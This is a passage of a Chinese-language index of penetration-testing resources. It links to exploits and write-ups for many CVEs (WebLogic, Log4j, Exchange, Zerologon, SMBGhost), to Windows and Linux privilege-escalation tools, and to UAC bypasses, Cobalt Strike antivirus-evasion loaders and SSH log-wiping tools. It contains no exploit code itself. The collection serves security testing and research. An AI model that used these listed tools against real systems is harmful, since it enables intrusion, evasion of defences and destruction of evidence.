[CVE-2020-2555-Oracle Coherence 反序列化漏洞](https://github.com/wsfengfan/CVE-2020-2555)|[分析文章](https://paper.seebug.org/1141/) - [cve-2020-5260-Git凭证泄露漏洞](https://github.com/brompwnie/cve-2020-5260) - [通达OA前台任意用户伪造登录漏洞批量检测](./通达OA前台任意用户伪造登录漏洞批量检测.md) - [CVE-2020-11890 JoomlaRCE <3.9.17 远程命令执行漏洞(需要有效的账号密码)](https://github.com/HoangKien1020/CVE-2020-11890) - [CVE-2020-10238【JoomlaRCE <= 3.9.15 远程命令执行漏洞(需要有效的账号密码)】&CVE-2020-10239【JoomlaRCE 3.7.0 to 3.9.15 远程命令执行漏洞(需要有效的账号密码)】](https://github.com/HoangKien1020/CVE-2020-10238) - [CVE-2020-2546,CVE-2020-2915 CVE-2020-2801 CVE-2020-2798 CVE-2020-2883 CVE-2020-2884 CVE-2020-2950 WebLogic T3 payload exploit poc python3](https://github.com/hktalent/CVE_2020_2546)|[CVE-2020-2883-Weblogic coherence.jar RCE](https://github.com/Y4er/CVE-2020-2883)|[WebLogic-Shiro-shell-WebLogic利用CVE-2020-2883打Shiro rememberMe反序列化漏洞,一键注册filter内存shell](https://github.com/Y4er/WebLogic-Shiro-shell)|[shiro_rce_tool:可能是最好用的shiro利用工具](https://github.com/wyzxxz/shiro_rce_tool)|[ShiroExploit:ShiroExploit 是一款 Shiro 可视化利用工具,集成密钥爆破,命令回显内存马注入等功能](https://github.com/KpLi0rn/ShiroExploit) - [tongda_oa_rce-通达oa 越权登录+文件上传getshell](https://github.com/clm123321/tongda_oa_rce) - [CVE-2020-11651-SaltStack Proof of Concept【认证绕过RCE漏洞】](https://github.com/0xc0d/CVE-2020-11651)|[CVE-2020-11651&&CVE-2020-11652 EXP](https://github.com/heikanet/CVE-2020-11651-CVE-2020-11652-EXP) - [showdoc的api_page存在任意文件上传getshell](./showdoc的api_page存在任意文件上传getshell.md) - [Fastjson <= 1.2.47 远程命令执行漏洞利用工具及方法](https://github.com/CaijiOrz/fastjson-1.2.47-RCE) - [SpringBoot_Actuator_RCE](https://github.com/jas502n/SpringBoot_Actuator_RCE) - [jizhicms(极致CMS)v1.7.1代码审计-任意文件上传getshell+sql注入+反射XSS](./books/jizhicms(极致CMS)v1.7.1代码审计引发的思考.pdf) - [CVE-2020-9484:Apache Tomcat Session 反序列化代码执行漏洞](./tools/CVE-2020-9484.tgz)|[CVE-2020-9484:Apache Tomcat 反序列化RCE漏洞的分析和利用](https://www.redtimmy.com/java-hacking/apache-tomcat-rce-by-deserialization-cve-2020-9484-write-up-and-exploit/) - [PHPOK 最新版漏洞组合拳 GETSHELL](./books/PHPOK最新版漏洞组合拳GETSHELL.pdf) - [Apache Kylin 3.0.1命令注入漏洞](https://community.sonarsource.com/t/apache-kylin-3-0-1-command-injection-vulnerability/25706) - [weblogic T3 collections java InvokerTransformer Transformer InvokerTransformer weblogic.jndi.WLInitialContextFactory](https://github.com/hktalent/weblogic_java_des) - [CVE-2020-5410 Spring Cloud Config目录穿越漏洞](https://xz.aliyun.com/t/7877) - [NewZhan CMS 全版本 SQL注入(0day)](./books/NewZhan%20CMS%20全版本%20SQL注入(0day).pdf) - [盲注 or 联合?记一次遇见的奇葩注入点之SEMCMS3.9(0day)](./books/盲注%20or%20联合?记一次遇见的奇葩注入点之SEMCMS3.9(0day).pdf) - [记一次SEMCMS代码审计](./books/记一次SEMCMS代码审计.pdf) - [对 SEMCMS 再一次审计](./books/对SEMCMS再一次审计.pdf) - [从PbootCMS(2.0.3&2.0.7前台RCE+2.0.8后台RCE)审计到某狗绕过](./books/从PbootCMS(2.0.3&2.0.7前台RCE+2.0.8后台RCE)审计到某狗绕过.pdf) - [CVE-2020-1948 : Apache Dubbo 远程代码执行漏洞](https://github.com/ctlyz123/CVE-2020-1948) - [CVE-2020-5902-F5 BIG-IP 远程代代码执行(RCE)&任意文件包含读取](https://github.com/jas502n/CVE-2020-5902)|[CVE-2020-5902又一EXP加测试docker文件](https://github.com/superzerosec/cve-2020-5902) - [CVE-2020-8193-Citrix未授权访问任意文件读取](https://github.com/jas502n/CVE-2020-8193) - [通读审计之天目MVC_T框架带Home版(temmokumvc)_v2.01](./books/通读审计之天目MVC_T框架带Home版(temmokumvc)_v2.01.pdf) - [CVE-2020-14645-WebLogic 远程代码执行漏洞](https://github.com/Y4er/CVE-2020-14645)|[Weblogic_CVE-2020-14645](https://github.com/DSO-Lab/Weblogic_CVE-2020-14645) - [CVE-2020-6287-SAP NetWeaver AS JAVA 授权问题漏洞-创建用户EXP](https://github.com/duc-nt/CVE-2020-6287-exploit)|[SAP_RECON-PoC for CVE-2020-6287, CVE-2020-6286 (SAP RECON vulnerability)](https://github.com/chipik/SAP_RECON) - [CVE-2018-1000861, CVE-2019-1003005 and CVE-2019-1003029-jenkins-rce](https://github.com/orangetw/awesome-jenkins-rce-2019) - [CVE-2020-3452:Cisco ASA/FTD 任意文件读取漏洞](./CVE-2020-3452:Cisco_ASAFTD任意文件读取漏洞.md) - [74CMS_v5.0.1后台RCE分析](./books/74CMS_v5.0.1后台RCE分析.pdf) - [CVE-2020-8163 - Remote code execution of user-provided local names in Rails](https://github.com/sh286/CVE-2020-8163) - [【0day RCE】Horde Groupware Webmail Edition RCE](./%E3%80%900day%20RCE%E3%80%91Horde%20Groupware%20Webmail%20Edition%20RCE.md) - [pulse-gosecure-rce-Tool to test for existence of CVE-2020-8218](https://github.com/withdk/pulse-gosecure-rce-poc) - [Exploit for Pulse Connect Secure SSL VPN arbitrary file read vulnerability (CVE-2019-11510)](https://github.com/BishopFox/pwn-pulse) - [Zblog默认Theme_csrf+储存xss+getshell](./Zblog默认Theme_csrf+储存xss+getshell.md) - [用友GRP-u8 注入+天融信TopApp-LB 负载均衡系统sql注入](https://mrxn.net/Infiltration/292.html)|[绿盟UTS综合威胁探针管理员任意登录复现](https://mrxn.net/Infiltration/276.html)|[HW弹药库之深信服EDR 3.2.21 任意代码执行漏洞分析](https://mrxn.net/jswz/267.html) - [CVE-2020-13935-Tomcat的WebSocket安全漏洞可导致拒绝服务攻击](https://github.com/RedTeamPentesting/CVE-2020-13935) - [Douphp 网站后台存储型XSS漏洞分析](./books/Douphp%20网站后台存储型XSS漏洞分析.pdf)-[原文地址](https://mp.weixin.qq.com/s/dmFoMJaUH_ULnhu_T9jSGA) - [Adminer 简单的利用](./books/Adminer简单的利用.pdf)-[原文地址](https://mp.weixin.qq.com/s/fgi4S-2vdvc-pSmFGGQzgw) - [骑士CMS assign_resume_tpl远程代码执行分析](./books/骑士CMS%20远程代码执行分析%20-%20Panda.pdf)-[原文地址](https://www.cnpanda.net/codeaudit/827.html) - [kibana由原型污染导致RCE的漏洞(CVE-2019-7609)](https://github.com/mpgn/CVE-2019-7609)-[YouTube相关报告](https://www.youtube.com/watch?v=KVDOIFeRaPQ) - [cve-2019-17558-apache solr velocity 注入远程命令执行漏洞 ](https://github.com/SDNDTeam/CVE-2019-17558_Solr_Vul_Tool) - [Weblogic Server(CVE-2021-2109 )远程代码执行漏洞](./books/Weblogic%20Server(CVE-2021-2109%20)远程代码执行漏洞复现.pdf)-[原文地址](https://mp.weixin.qq.com/s/kEi1s3Ki-h7jjdO7gyDsaw) - [辰光PHP客服系统源码3.6 前台 getshell-0day](./books/辰光PHP客服系统源码3.620%前台20%getshell-0day.pdf)|[原文地址](https://mp.weixin.qq.com/s/jWqhZYXuBQ2kfpvnWsfeXA) - [zzzcms(asp)前台Getshell](./zzzcms(asp)前台Getshell.md) - [wjdhcms前台Getshell(条件竞争)](./books/wjdhcms前台Getshell(条件竞争).pdf)-[原文地址](https://www.t00ls.net/articles-59727.html) - [glpi_cve-2020-11060](https://github.com/zeromirror/cve_2020-11060)-[相关文章](https://xz.aliyun.com/t/9144) - [CVE-2021-21315-PoC-Node.js组件systeminformation代码注入漏洞](https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC) - [CVE-2021-23132-Joomla! 目录遍历导致 RCE 漏洞EXP](https://github.com/HoangKien1020/CVE-2021-23132)|[复现文章](./books/Joomla!%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%EF%BC%88CVE-2021-23132%EF%BC%89.pdf)-[原文链接](https://mp.weixin.qq.com/s/rRTCG4Q2X310KoqZNvpuPA) - [对ShirneCMS的一次审计思路-反序列化getshell](./books/对ShirneCMS的一次审计思路.pdf)-[原文地址](https://mp.weixin.qq.com/s/aps0k7O6BO-UQ0gXbTN3KQ)-[cms地址1](https://gitee.com/shirnecn/ShirneCMS)-[cms地址2](https://github.com/80027505/shirne) - [Apache Solr最新版任意文件读取0day](./books/Apache%20Solr最新版任意文件读取0day.pdf)|[原文地址](https://mp.weixin.qq.com/s/HMtAz6_unM1PrjfAzfwCUQ) - [KiteCMS的漏洞挖掘之旅(任意文件写入、任意文件读取和反序列化)](./books/KiteCMS的漏洞挖掘之旅(任意文件写入、任意文件读取和反序列化).pdf)|[原文地址](https://mp.weixin.qq.com/s/ETm92MHTNksURjOPNqFgHg) - [CVE-2021-22986-F5 BIG-IP 远程代码执行漏洞EXP](https://github.com/S1xHcL/f5_rce_poc) - [CNVD-2021-10543:MessageSolution 企业邮件归档管理系统 EEA 存在信息泄露漏洞](https://github.com/Henry4E36/CNVD-2021-10543) - [CVE-2021-26295-POC](https://github.com/yumusb/CVE-2021-26295-POC) - [eyouRCE:(CNVD-2021-26422)亿邮电子邮件系统 远程命令执行漏洞 python版本](https://github.com/Henry4E36/eyouRCE)|[EYouMailRCE:jar单文件版本](https://github.com/Tas9er/EYouMailRCE) - [ThinkPHP3.2.x RCE漏洞](./books/ThinkPHP3.2.x%20RCE漏洞通报.pdf) - [Apache Solr SSRF(CVE-2021-27905)](https://github.com/Henry4E36/Solr-SSRF) - [Coremail任意文件上传漏洞POC,支持单个或者批量检测](https://github.com/jimoyong/CoreMailUploadRce) - [CVE-2021-26086 :Atlassian Jira Server/Data Center 8.4.0 File Read 漏洞](https://github.com/ColdFusionX/CVE-2021-26086) - [CVE-2021-41773 CVE-2021-42013漏洞批量检测工具:Apache 2.4.49 和 2.4.50版本任意文件读取和命令执行漏洞绕过利用工具](https://github.com/inbug-team/CVE-2021-41773_CVE-2021-42013) - [CVE-2021-24499:Workreap Theme 小于2.2.1 未授权任意文件上传导致 RCE](https://github.com/RyouYoo/CVE-2021-24499) - [CVE-2021-30632:chrome V8越界写入漏洞可至内存损坏](https://github.com/Phuong39/PoC-CVE-2021-30632) - [laravel-exploits:Exploit for CVE-2021-3129](https://github.com/ambionics/laravel-exploits) - [CVE-2021-21234:Spring Boot 目录遍历](https://github.com/xiaojiangxl/CVE-2021-21234) - [CVE-2021-22205:gitlab ce 文件上传 ExifTool导致命令执行 的 RCE 漏洞](https://github.com/RedTeamWing/CVE-2021-22205) - [Hadoop Yarn RPC未授权RCE](https://github.com/cckuailong/YarnRpcRCE) - [CVE-2021-41277:Metabase 敏感信息泄露](https://github.com/Seals6/CVE-2021-41277) - [Alibaba Sentinel 前台 SSRF](https://github.com/alibaba/Sentinel/issues/2451) - [CVE-2021-37580:Apache ShenYu权限认证绕过](https://github.com/fengwenhua/CVE-2021-37580) - [log4j2_rce](https://github.com/dbgee/log4j2_rce)|[apache-log4j-poc](https://github.com/tangxiaofeng7/apache-log4j-poc)|[CVE-2021-44228:Log4j2](https://github.com/jas502n/Log4j2-CVE-2021-44228)|[log4shell-vulnerable-app:又一个 log4j 练习 APP](https://github.com/christophetd/log4shell-vulnerable-app) - [cve-2021-45232-exp:Apache apisix dashboard unauthcation rce](https://github.com/wuppp/cve-2021-45232-exp) - [Spring Boot + H2数据库JNDI注入](./books/Spring%20Boot%20+%20H2数据库JNDI注入.html)|[原文地址](https://mp.weixin.qq.com/s/Yn5U8WHGJZbTJsxwUU3UiQ) - [CVE-2021-43297:Apache Dubbo Hessian2异常处理时的反序列化](https://github.com/longofo/Apache-Dubbo-Hessian2-CVE-2021-43297) - [CVE-2022-21371:Oracle WebLogic Server LFI](https://github.com/Mr-xn/CVE-2022-21371) ## <span id="head5"> 提权辅助相关</span> - [windows-kernel-exploits Windows平台提权漏洞集合](https://github.com/SecWiki/windows-kernel-exploits) - [windows 溢出提权小记](https://klionsec.github.io/2017/04/22/win-0day-privilege/)/[本地保存了一份+Linux&Windows提取脑图](./tools/Local%20Privilege%20Escalation.md) - [Windows常见持久控制脑图](./tools/Windows常见持久控制.png) - [CVE-2019-0803 Win32k漏洞提权工具](./CVE-2019-0803) - [脏牛Linux提权漏洞](https://github.com/Brucetg/DirtyCow-EXP)-[reverse_dirty-更改的脏牛提权代码,可以往任意文件写入任意内容](https://github.com/Rvn0xsy/reverse_dirty)|[linux_dirty:更改后的脏牛提权代码,可以往任意文件写入任意内容,去除交互过程](https://github.com/Rvn0xsy/linux_dirty) - [远控免杀从入门到实践之白名单(113个)](https://github.com/TideSec/BypassAntiVirus)|[远控免杀从入门到实践之白名单(113个)总结篇.pdf](./books/远控免杀从入门到实践之白名单(113个)总结篇.pdf) - [Linux提权-CVE-2019-13272 A linux kernel Local Root Privilege Escalation vulnerability with PTRACE_TRACEME](https://github.com/jiayy/android_vuln_poc-exp/tree/master/EXP-CVE-2019-13272-aarch64) - [Linux权限提升辅助一键检测工具](https://github.com/mzet-/linux-exploit-suggester) - [将powershell脚本直接注入到进程中执行来绕过对powershell.exe的限制](https://github.com/EmpireProject/PSInject) - [CVE-2020-2696 – Local privilege escalation via CDE dtsession](https://github.com/0xdea/exploits/blob/master/solaris/raptor_dtsession_ipa.c) - [CVE-2020-0683-利用Windows MSI “Installer service”提权](https://github.com/padovah4ck/CVE-2020-0683/) - [Linux sudo提权辅助工具—查找sudo权限配置漏洞](https://github.com/TH3xACE/SUDO_KILLER) - [Windows提权-CVE-2020-0668:Windows Service Tracing本地提权漏洞](https://github.com/RedCursorSecurityConsulting/CVE-2020-0668) - [Linux提取-Linux kernel XFRM UAF poc (3.x - 5.x kernels)2020年1月前没打补丁可测试](https://github.com/duasynt/xfrm_poc) - [linux-kernel-exploits Linux平台提权漏洞集合](https://github.com/SecWiki/linux-kernel-exploits) - [Linux提权辅助检测Perl脚本](https://github.com/jondonas/linux-exploit-suggester-2)|[Linux提权辅助检测bash脚本](https://github.com/mzet-/linux-exploit-suggester) - [CVE-2020-0796 - Windows SMBv3 LPE exploit #SMBGhost](https://github.com/danigargu/CVE-2020-0796)|[【Windows提取】Windows SMBv3 LPE exploit 已编译版.exe](https://github.com/f1tz/CVE-2020-0796-LPE-EXP)|[SMBGhost_RCE_PoC-远程代码执行EXP](https://github.com/chompie1337/SMBGhost_RCE_PoC)|[Windows_SMBv3_RCE_CVE-2020-0796漏洞复现](./books/Windows_SMBv3_RCE_CVE-2020-0796漏洞复现.pdf) - [getAV---windows杀软进程对比工具单文件版](./tools/getAV/) - [【Windows提权工具】Windows 7 to Windows 10 / Server 2019](https://github.com/CCob/SweetPotato)|[搭配Cobalt Strike的修改版可上线system权限的session](https://github.com/lengjibo/RedTeamTools/tree/master/windows/SweetPotato) - [【Windows提权工具】SweetPotato修改版,用于webshell下执行命令](https://github.com/uknowsec/SweetPotato)|[本地编译好的版本](./tools/SweetPotato.zip)|[点击下载或右键另存为](https://raw.githubusercontent.com/Mr-xn/Penetration_Testing_POC/master/tools/SweetPotato.zip)|[SweetPotato_webshell下执行命令版.pdf](./books/SweetPotato_webshell下执行命令版.pdf)|[JuicyPotato修改版-可用于webshell](https://github.com/uknowsec/JuicyPotato) - [【bypass UAC】Windows 8.1 and 10 UAC bypass abusing WinSxS in "dccw.exe"](https://github.com/L3cr0f/DccwBypassUAC/) - [【Windows提权】CVE-2018-8120 Exploit for Win2003 Win2008 WinXP Win7](https://github.com/alpha1ab/CVE-2018-8120) - [【Windows提权 Windows 10&Server 2019】PrintSpoofer-Abusing Impersonation Privileges on Windows 10 and Server 2019](https://github.com/itm4n/PrintSpoofer)|[配合文章食用-pipePotato复现](./books/pipePotato复现.pdf)|[Windows 权限提升 BadPotato-已经在Windows 2012-2019 8-10 全补丁测试成功](https://github.com/BeichenDream/BadPotato) - [【Windows提权】Windows 下的提权大合集](https://github.com/lyshark/Windows-exploits) - [【Windows提权】-CVE-2020-1048 | PrintDemon本地提权漏洞-漏洞影响自1996年以来发布(Windows NT 4)的所有Windows版本](https://github.com/ionescu007/PrintDemon) - [【Windows bypass UAC】UACME-一种集成了60多种Bypass UAC的方法](https://github.com/hfiref0x/UACME) - [CVE-2020–1088: Windows wersvc.dll 任意文件删除本地提权漏洞分析](https://medium.com/csis-techblog/cve-2020-1088-yet-another-arbitrary-delete-eop-a00b97d8c3e2) - [【Windows提权】CVE-2019-0863-Windows中错误报告机制导致的提权-EXP](https://github.com/sailay1996/WerTrigger) - [【Windows提权】CVE-2020-1066-EXP](https://github.com/cbwang505/CVE-2020-1066-EXP) - [【Windows提权】CVE-2020-0787-EXP-ALL-WINDOWS-VERSION-适用于Windows所有版本的提权EXP](https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION)|[CVE-2020-0787:提权带回显](https://github.com/yanghaoi/CVE-2020-0787)|[CVE-2020-0787_CNA:适用于Cobalt Strike的CVE-2020-0787提权文件](https://github.com/yanghaoi/CobaltStrike_CNA/tree/main/ReflectiveDllSource/CVE-2020-0787_CNA) - [【Windows提权】CVE-2020-1054-Win32k提权漏洞Poc](https://github.com/0xeb-bp/cve-2020-1054)|[CVE-2020-1054-POC](https://github.com/Iamgublin/CVE-2020-1054) - [【Linux提权】对Linux提权的简单总结](./books/对Linux提权的简单总结.pdf) - [【Windows提权】wesng-Windows提权辅助脚本](https://github.com/bitsadmin/wesng) - [【Windows提权】dazzleUP是一款用来帮助渗透测试人员进行权限提升的工具,可以在window系统中查找脆弱面进行攻击。工具包括两部分检查内容,exploit检查和错误配置检查。](https://github.com/hlldz/dazzleUP) - [【Windows提权】KernelHub-近二十年Windows权限提升集合](https://github.com/Ascotbe/KernelHub) - [【Windows提权】Priv2Admin-Windows提权工具](https://github.com/gtworek/Priv2Admin) - [【windows提权】利用有漏洞的技嘉驱动程序来加载恶意的驱动程序提升权限或干掉驱动级保护的杀软](https://github.com/alxbrn/gdrv-loader)|[备份地址](https://github.com/Mr-xn/gdrv-loader) - [【windows提权】byeintegrity-uac:通过劫持位于本机映像缓存中的DLL绕过UAC](https://github.com/AzAgarampur/byeintegrity-uac) - [【Windows 提取】InstallerFileTakeOver:Windows Installer 本地提权漏洞PoC](https://github.com/klinix5/InstallerFileTakeOver) - [【Linux 提权】CVE-2021-4034:Linux Polkit 权限提升漏洞(pkexec)](https://github.com/berdav/CVE-2021-4034) ## <span id="head6"> PC</span> - [ 微软RDP远程代码执行漏洞(CVE-2019-0708)](./BlueKeep)-[CVE-2019-0708-EXP-Windows-CVE-2019-0708-EXP-Windows版单文件exe版,运行后直接在当前控制台反弹System权限Shell](https://github.com/cbwang505/CVE-2019-0708-EXP-Windows) - [CVE-2019-0708-python版](./BlueKeep/bluekeep-CVE-2019-0708-python) - [MS17-010-微软永恒之蓝漏洞](https://github.com/Mr-xn/MS17-010) - [macOS-Kernel-Exploit](./macOS-Kernel-Exploit) - [CVE-2019-1388 UAC提权 (nt authority\system)](https://github.com/jas502n/CVE-2019-1388) - [CVE-2019-1405和CVE-2019-1322:通过组合漏洞进行权限提升 Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation](https://github.com/apt69/COMahawk) - [CVE-2019-11708](https://github.com/0vercl0k/CVE-2019-11708) - [Telegram(macOS v4.9.155353) 代码执行漏洞](https://github.com/Metnew/telegram-links-nsworkspace-open) - [Remote Desktop Gateway RCE bugs CVE-2020-0609 & CVE-2020-0610](https://www.kryptoslogic.com/blog/2020/01/rdp-to-rce-when-fragmentation-goes-wrong/) - [Microsoft SharePoint - Deserialization Remote Code Execution](https://github.com/Voulnet/desharialize/blob/master/desharialize.py) - [CVE-2020-0728-Windows Modules Installer Service 信息泄露漏洞](https://github.com/irsl/CVE-2020-0728/) - [CVE-2020-0618: 微软 SQL Server Reporting Services远程代码执行(RCE)漏洞](https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/)|[GitHub验证POC(其实前文的分析文章也有)](https://github.com/euphrat1ca/CVE-2020-0618) - [CVE-2020-0767Microsoft ChakraCore脚本引擎【Edge浏览器中的一个开源的ChakraJavaScript脚本引擎的核心部分】安全漏洞](https://github.com/phoenhex/files/blob/master/pocs/cve-2020-0767.js) - [CVE-2020-0688:微软EXCHANGE服务的远程代码执行漏洞](https://github.com/random-robbie/cve-2020-0688)|[CVE-2020-0688_EXP---另一个漏洞检测利用脚本](https://github.com/Yt1g3r/CVE-2020-0688_EXP)|[又一个cve-2020-0688利用脚本](https://github.com/Ridter/cve-2020-0688)|[Exploit and detect tools for CVE-2020-0688](https://github.com/zcgonvh/CVE-2020-0688) - [CVE-2020-0674: Internet Explorer远程代码执行漏洞检测](https://github.com/binaryfigments/CVE-2020-0674) - [CVE-2020-8794: OpenSMTPD 远程命令执行漏洞](./CVE-2020-8794-OpenSMTPD%20远程命令执行漏洞.md) - [Linux平台-CVE-2020-8597: PPPD 远程代码执行漏洞](https://github.com/marcinguy/CVE-2020-8597) - [Windows-CVE-2020-0796:疑似微软SMBv3协议“蠕虫级”漏洞](https://cert.360.cn/warning/detail?id=04f6a686db24fcfa478498f55f3b79ef)|[相关讨论](https://linustechtips.com/main/topic/1163724-smbv3-remote-code-execution-cve-2020-0796/)|[CVE-2020–0796检测与修复](CVE-2020-0796检测与修复.md)|[又一个CVE-2020-0796的检测工具-可导致目标系统崩溃重启](https://github.com/eerykitty/CVE-2020-0796-PoC) - [SMBGhost_RCE_PoC(CVE-2020-0796)](https://github.com/chompie1337/SMBGhost_RCE_PoC) - [WinRAR 代码执行漏洞 (CVE-2018-20250)-POC](https://github.com/Ridter/acefile)|[相关文章](https://research.checkpoint.com/2019/extracting-code-execution-from-winrar/)|[全网筛查 WinRAR 代码执行漏洞 (CVE-2018-20250)](https://xlab.tencent.com/cn/2019/02/22/investigating-winrar-code-execution-vulnerability-cve-2018-20250-at-internet-scale/) - [windows10相关漏洞EXP&POC](https://github.com/nu11secur1ty/Windows10Exploits) - [shiro rce 反序列 命令执行 一键工具](https://github.com/wyzxxz/shiro_rce) - [CVE-2019-1458-Win32k中的特权提升漏洞【shell可用-Windows提取】](https://github.com/unamer/CVE-2019-1458) - [CVE-2019-1253-Windows权限提升漏洞-AppXSvc任意文件安全描述符覆盖EoP的另一种poc](https://github.com/sgabe/CVE-2019-1253)|[CVE-2019-1253](https://github.com/padovah4ck/CVE-2019-1253) - [BypassAV【免杀】Cobalt Strike插件,用于快速生成免杀的可执行文件](https://github.com/hack2fun/BypassAV) - [CS-Loader-cobalt strike免杀生成](https://github.com/Gality369/CS-Loader) - [CVE-2020-0674:Internet Explorer UAF 漏洞exp【在64位的win7测试了IE 8, 9, 10, and 11】](https://github.com/maxpl0it/CVE-2020-0674-Exploit) - [SMBGhost_AutomateExploitation-SMBGhost (CVE-2020-0796) Automate Exploitation and Detection](https://github.com/Barriuso/SMBGhost_AutomateExploitation) - [MS Windows OLE 远程代码执行漏洞(CVE-2020-1281)](https://github.com/guhe120/Windows-EoP/tree/master/CVE-2020-1281) - [CVE-2020-1350-Windows的DNS服务器RCE检测的powershell脚本](https://github.com/T13nn3s/CVE-2020-1350)|[CVE-2020-1350-DoS](https://github.com/maxpl0it/CVE-2020-1350-DoS) - [CVE-2020-1362-Microsoft Windows WalletService权限提升漏洞](https://github.com/Q4n/CVE-2020-1362) - [CVE-2020-10713-GRUB2 本地代码执行漏洞](https://github.com/eclypsium/BootHole) - [CVE-2020-1313-Microsoft Windows Update Orchestrator Service权限提升漏洞,可用于Windows提权操作,支持新版的Windows server 2004](https://github.com/irsl/CVE-2020-1313) - [CVE-2020-1337-exploit-Windows 7/8/10上Print Spooler组件漏洞修复后的绕过](https://github.com/math1as/CVE-2020-1337-exploit/)|[cve-2020-1337-poc](https://github.com/sailay1996/cve-2020-1337-poc) - [CVE-2020-1472: NetLogon特权提升漏洞(接管域控制器)](https://github.com/VoidSec/CVE-2020-1472)|[CVE-2020-1472 .NET版本的,可以编译成独立EXE文件,可以尝试webshell执行](https://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon/SharpZeroLogon)|[同类型脚本](https://github.com/SecuraBV/CVE-2020-1472)|[同类型脚本二](https://github.com/dirkjanm/CVE-2020-1472)|[同类型脚本三](https://github.com/risksense/zerologon)|[同类型脚本4](https://github.com/bb00/zer0dump) - [awesome-browser-exploit-浏览器漏洞集合](https://github.com/Escapingbug/awesome-browser-exploit) - [【Linux提权】CVE-2021-3156-SUDO缓冲区溢出漏洞](https://github.com/blasty/CVE-2021-3156) - [CVE-2021-21972-任意文件上传](https://github.com/NS-Sp4ce/CVE-2021-21972)|[CVE-2021-21972-vCenter-6.5-7.0-RCE-POC](https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC)|[CVE-2021-21972](https://github.com/yaunsky/CVE-2021-21972) - [CVE-2021-26855-ssrf通过golang实现,可读取邮件标题,id,FQND以及下载邮件功能](https://github.com/Mr-xn/CVE-2021-26855)|[针对CVE-2021-26855进行利用下载邮件的python脚本](https://github.com/Mr-xn/CVE-2021-26855-d)|[exchange-ssrf-rce-利用SSRF直接获取命令执行权限](https://github.com/jeningogo/exchange-ssrf-rce) [exprolog-ProxyLogon Full Exploit Chain PoC (CVE-2021–26855, CVE-2021–26857, CVE-2021–26858, CVE-2021–27065)](https://github.com/herwonowr/exprolog) - [CVE-2021-21978- VMware View Planner Harness 4.X 未授权任意文件上传至RCE](https://github.com/GreyOrder/CVE-2021-21978) - [VMware vCenter Server RCE_SSRF[CVE-2021-21972_3]](./books/VMware%20vCenter%20Server%20RCE_SSRF%5BCVE-2021-21972_3%5D.pdf)-[原文地址](https://mp.weixin.qq.com/s/NoqpuklgwNOalJgAuFnlcA) - [CVE-2021-1732 Windows 本地权限提升漏洞](https://github.com/jessica0f0116/cve_2021_1732) - [CVE-2021-31166:HTTP协议栈远程代码执行漏洞](https://github.com/0vercl0k/CVE-2021-31166) - [Windows本地提权漏洞:CVE-2021-1732-Exploit](https://github.com/KaLendsi/CVE-2021-1732-Exploit) - [【Linux提权】CVE-2021-3560 Local PrivEsc Exploit](https://github.com/swapravo/polkadots) - [【windows提权】CVE-2021-1675 Windows Print Spooler远程代码执行漏洞](./CVE-2021-1675.md) - [【Linux提权】CVE-2021-22555: Linux Netfilter本地权限提升漏洞](./CVE-2021-22555.md) - [【Linux提权】CVE-2021-33909:Linux kernel 本地提权漏洞](https://github.com/Liang2580/CVE-2021-33909) - [【windows提权】CVE-2021-36934:Windows 特权提升漏洞](./books/CVE-2021-36934:Windows提权漏洞.pdf)|[CVE-2021-36934 POC](https://github.com/cube0x0/CVE-2021-36934) - [【Linux提权】CVE-2021-3490:Linux kernel 缓冲区错误漏洞](https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490) - [CVE-2021-34473:Microsoft Exchange Server Remote Code Execution](https://github.com/phamphuqui1998/CVE-2021-34473)|[proxyshell-auto:自动化的ProxyShell漏洞利用](https://github.com/Udyz/proxyshell-auto) - [【Linux 提权】CVE-2021-33909:Linux kernel 本地提权漏洞](https://github.com/ChrisTheCoolHut/CVE-2021-33909) - [CVE-2021-40444:Windows MSHTML 0day漏洞](https://github.com/lockedbyte/CVE-2021-40444) - [PrintNightmare:CVE-2021-1675 / CVE-2021-34527 exploit](https://github.com/outflanknl/PrintNightmare) - [CVE-2021-40444:MSHTML代码执行漏洞 RCE](https://github.com/lockedbyte/CVE-2021-40444) - [CVE-2021-37980:Google Chrome 沙箱漏洞 POC](https://github.com/ZeusBox/CVE-2021-37980) - [CVE-2021-40449 EXP about windows 10 14393 LPE](https://github.com/KaLendsi/CVE-2021-40449-Exploit) - [CVE-2021-22005:VMware vCenter Server任意文件上传漏洞](https://github.com/r0ckysec/CVE-2021-22005)|[又一个 cve-2021-22005利用工具(仅支持 Linux 版本的vCenter)](https://github.com/shmilylty/cve-2021-22005-exp) - [CVE-2021-40539:ManageEngine ADManager Plus 未授权访问RCE](https://github.com/synacktiv/CVE-2021-40539) - [CVE-2021-42321:微软Exchange Server远程代码执行漏洞(需要省份验证)](https://github.com/DarkSprings/CVE-2021-42321) - [VMware_vCenter:VMware vCenter版本小于7.0.2.00100的未授权任意文件读取+SSRF+XSS](https://github.com/l0ggg/VMware_vCenter) - [noPac:CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter(Microsoft Windows Active Directory 权限许可和访问控制问题漏洞)](https://github.com/cube0x0/noPac)|[Python 版本noPac](https://github.com/Ridter/noPac) - [CVE-2022-21907](https://github.com/nu11secur1ty/Windows10Exploits/tree/master/2022/CVE-2022-21907)|[CVE-2022-21907:Windows HTTP协议栈远程代码执行漏洞(有待验证)](https://github.com/antx-code/CVE-2022-21907)|[PowerShell 版本CVE-2022-21907:Windows HTTP协议栈远程代码执行漏洞检查工具](https://github.com/mauricelambert/CVE-2022-21907) ## <span id="head7"> tools-小工具集版本合</span> - [java环境下任意文件下载情况自动化读取源码的小工具](https://github.com/Artemis1029/Java_xmlhack) - [Linux SSH登录日志清除/伪造](./tools/ssh) - [python2的socks代理](./tools/s5.py) - [dede_burp_admin_path-dedecms后台路径爆破(Windows环境)](./tools/dede_burp_admin_path.md) - [PHP 7.1-7.3 disable_functions bypass](./tools/PHP%207.1-7.3%20disable_functions%20bypass.md) - 